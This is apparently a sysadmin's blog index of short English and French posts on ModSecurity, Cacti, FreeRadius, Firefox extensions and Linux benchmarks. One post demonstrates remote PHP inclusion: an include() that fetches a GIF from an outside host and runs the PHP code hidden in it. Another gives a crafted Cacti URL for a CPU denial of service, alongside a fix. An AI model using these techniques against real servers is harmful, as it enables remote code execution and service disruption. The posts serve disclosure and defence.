VMWare If the previous version of VMWare Converter for Linux was quite buggy (I had errors when trying to convert virtual machines stored on NFS or mount via SSH/Fuse), the 4.0.1 works well: I installed it on a VM running Ubuntu 9.04, and manage to convert (windows) VM without any problem.
Read the complete article »

August 20, 2009, 2:30 pm lock

BlueProximityCette petite applet Gnome permet de vérouiller automatiquement la session X11 en fonction de votre distance avec la machine, enfin plutôt de celle de votre téléphone portable bluetooth. Ce n’est pas du tout inviolable, mais c’est quand même trés pratique (et amusant) !

Plus d’infos dans ce forum.

September 11, 2008, 9:54 am lock

So you your boss asked you to secure his new strategic web application which is part of his plan to conquer the world. But that damn developers are used to think that their work is finish when it just works, and debugging their whole code is simply not an option. Here’s the solution: use a web application firewall like ModSecurity2.

ModSecurity can be embedded as a module on your webserver, or you can set up an Apache based reverse web proxy with ModSecurity protecting multiple web sites, without wondering which kind of server they are running.

It can be used in different ways: either to intercept know exploits or suspicious activities, or to simply only allow access to your application web page, parameters, and the kind of characters the value’s parameters are supposed to be… But the last step might require a lot of work, so you may want to combine generic rules with a few rules dedicated to forbid the use of the holes you’ve just found on your brand new web site.

A set of “generic rules” is provided with ModSecurity: the Core Rules. For optimization reasons, the regular expressions (rules are based on regexp) are mixed in a small number of rules and are almost not understandable for most of them. The script used for this task is not yet released, but should be in a “near feature” according to Breach. Update: Yes, it was released here !

You might also pick rules from alternative sources, like gotroot.com.

If you install rules from the tarball found on the website, be sure to remove write permissions on them for everybody (yes, default permissions are -rw-rw-rw- !!!).

Now, let’s try to make a few rules:

You might first want to whitelist an IP address. The following rule can be added to your own file on your core rules directory, or better (especially if you have multiple virtual host), on the virtual host config file:

<IfModule mod_security2.c>SecRule REMOTE_ADDR "^192.168.1.100$" phase:1,nolog,allow,ctl:ruleEngine=DetectionOnly</IfModule>

Read the complete article »

November 29, 2007, 1:08 am lock

Since all current CPU in new servers are able to run in 64 bits mode, and most Linux distribution are also available in 64 bits version, I was wondering why we still continue to install 32 bits operating systems ?

So, I took two Dell Poweredge 1950 with two Intel Pentium 4 Xeon quad-core 2 GHz with 2 Go of Ram and installed the Debian 4.0 (Etch) Linux distribution on both servers. On the first one, the usual i386 version is installed; on the second, the amd64 version.

AMD Athlon 64 bit

Do not confuse EM64T with IA-64: IA-64 is the name hof an architecture used (mostly unused now) for Itanium processors, developped by Intel in collaboraion with HP. EM64T is the 64 bit intruction set that you get when you buy a server with an Intel processor. Officialy, it is different from AMD’s. In fact, really not much: apart from subtle differences in instruction sets, and one which implements 3DNow, and the other SSE3, they are almost compatible.

The tests:

The tests were performed in two areas, where high CPU performance is required: database and SSL requests, and in two forms, a generic benchmark, and a home-made test, which aims to to be more representative of real-life:

  • First, Mysql performance, ussing sql-bench (provided by Myql) and secondly, SQL stats requests with a 1 507 500 entries database extracted from a production Mysql Radius log server.
  • Next, a SSL performance test, with Openssl built-in speed test, followed by a (quickly) home-made script which made an incremental number of concurrent HTTPS requests on a 14K text file, and measures the time spent.

Read the complete article »

August 29, 2007, 9:07 am lock

As reported by the ISC, some people are using images to hide PHP code : if an image, contains PHP code, for example in the comment section, it may be included as an usual PHP file, and the PHP code will be happily executed. It may be a great way to hide malicious code in hacked servers and to bypass some IDS/WAF…

Here’s a demo: create a PHP file that would include this innocent image :

<?php
include("http://mdessus.free.fr/Divers/imgwithphpcmd.gif");
?>

go to the previously created file’s URL, and voila :

PHP commands embedded from an image

June 19, 2007, 4:19 pm lock

It is possible to an authenticated user in Cacti to modify the graph_start and graph_end parameters values in the URL, and specify higher numbers than expected in order to make cacti use all the server CPU.
For example, if an user modify a graph URL as seen is the location bar:

http://localhost/cacti/graph_image.php?local_graph_id=2&rra_id=0&view_type=tree&graph_start=1164236234&graph_end=1179871034

to this one:

http://localhost/cacti/graph_image.php?local_graph_id=2&rra_id=0&view_type=tree&graph_start=1164236234000&graph_end=1179871034000

rrdtool will take 100% of the CPU (for a long time). By doing multiple requests like this, an attacker may create a denial of service on the server running Cacti.

Proposed patch:

Modify the check done in the file lib/html_validate.php (function input_validate_input_number in Cacti current version) by adding a second check like this:

36a37,39
>        if ($value >= 10000000000) {
>              die_html_input_error();
>        }

Read the complete article »

June 2, 2007, 12:17 pm lock

Un des grand atout de Firefox est la possibilité d’ajout d’extensions, qui permettent d’apporter de nouvelles fonctionnalités ou de modifier son comportement. Voici celles qui sont les plus utiles :

  • Adblock Plus : cette extension supprime la majorité des publicités, rendant les pages plus lisibles et moins lourdes à télécharger.
  • Firebug : sans aucun doute la plus évoluée et la plus aboutie des extensions firefox, tout simplement indispensable pour les développeurs (entre autres) :
    • Requêtes web (avec les temps de chargement individuel et cumulé, les headers, les réponses…)
    • Debug et profiling Javascript
    • Analyse et modification dynamiquement du HTML, DOM, CSS…
  • Web Developer : permet d’ajouter une barre d’outils pour développeurs web avec des fonctionnalités qui se recoupent ou qui sont complémentaires avec l’extension précédente.
  • gTranslate : la plus simple, mais aussi une des plus pratique de toutes ces extensions. Une fois les langues par défaut choisies, il suffit de sélectionner, un mot ou une phrase, puis de cliquer sur translate dans dans le menu ouvert par un clic droit, et l’expression est traduite (par les soins de Google) : gtranslate screenshot
  • Mouse Gestures : associez des gestes de souris à vos actions les plus utilisées.
  • Nagios Checker : pour ceux qui utilisent Nagios, ce plugin permet de rajouter dans la barre d’état de Firefox la liste des alarmes Nagios : Nagios Checker
  • PrefBar : permet d’avoir une barre personalisable comprenant des boutons pouvant réaliser différentes tâches: désactifer les popups, désactiver Java, séléctionner un proxy, changer le user-agent… Utilisable en tant que barre dédiée, ou insérée dans la barre des signets : Prefbar screenshot
  • Greasemonkey : permet de modifier le comportement d’un site web (pour supprimer un comportement ennuyeux, ou pour rajouter des fonctionnalités par exemple) en utilisant des scripts réalisés par d’autres ou par ses propres soins.
  • Tab Mix Plus : rajoute de nombreuses fonctionnalités aux tabulations, comme la possibilité de réordonnancer les tabs, mais surtout, le undo close tab !

De nombreuses autres extensions sont disponibles sur le site de Mozilla.

May 18, 2007, 11:18 pm lock

ModSecurity2 is a Web Application Firewall, integrated into Apache as a module. You can use it at the final web server by adding the module (especially if you have a HTTPS web server, so your IDS/IPS cannot analyze these flows), or by adding an Apache based reverse proxy in front of your web server(s).
This will show you how to install ModSecutity on your favorite Linux, Debian Sarge or Ubuntu Edgy Eft.

Your fisrt need to download the source tarball at the Breach web site.

Check that you have removed any previous installed version ( apt-get remove libapache2-mod-security mod-security-common for Ubuntu), and install the required development files:

apt-get install apache2-prefork-dev  libxml++2.6-dev

(the default Apache version is the mpm-prefork, but you may check if your are using the prefork or the threaded version with the command dpkg –get-selections | grep apache2 ).

In the directory where you have (already) detared the ModSecurity package, go to the apache2 directory, and in the Makefile file, look for the line containing top_dir and replace it with:

top_dir      = /usr/share/apache2/

Then, execute the make command.

Once the compilation ends, install the module (as root): sudo make install

You must now configure Apache for loading the module:
Read the complete article »

March 19, 2007, 2:39 pm lock

FreeRadius is now the default Radius server at my employer (french telco/ISP), and we are really happy with that. However, I was asked to find a way to have round-robin repartition between LNS, and it is not a Freeradius functionality.
I first stared to use a external program executed with the attr_rewrite module to randomly select a LNS in the database and replacing int in the reply :

#!/bin/sh
LNS=`mysql -ss -e "SELECT ip FROM lns ORDER BY RAND() LIMIT 1;" -h dbhost -u dbuser -pdbpass radius`
echo -n $LNS

But, this works for replacing one parameter only: I cannot replace several parameters at once, and since the values must match against each other (the Tunnel-Server-Auth-Id name must match the Tunnel-Server-Endpoint IP) it is impossible to make several different random choices.

So, my solution consists in modifying the SQL groupreply request (in the sql.conf file).
Read the complete article »

March 15, 2007, 7:04 pm lock

After six month of nice work on my laptop (Asus V6J), Ubuntu has released a new version, code name: Edgy Eft (version 6.10). The upgrade worked quite well on my lpatop, only few minor annoyances (the worst problem was caused by generation of wrong UUID for swap) .

What’s new in this release:

  • Optimized startup with Upstart, an init replacement
  • Some software updates (Firefox 2)
  • The memory card reader is working (with SD card, but not with Memory stick)

So, is it worth the upgrade ? No real revolution, this release is mostly a minor upgrade.

March 1, 2007, 1:46 am lock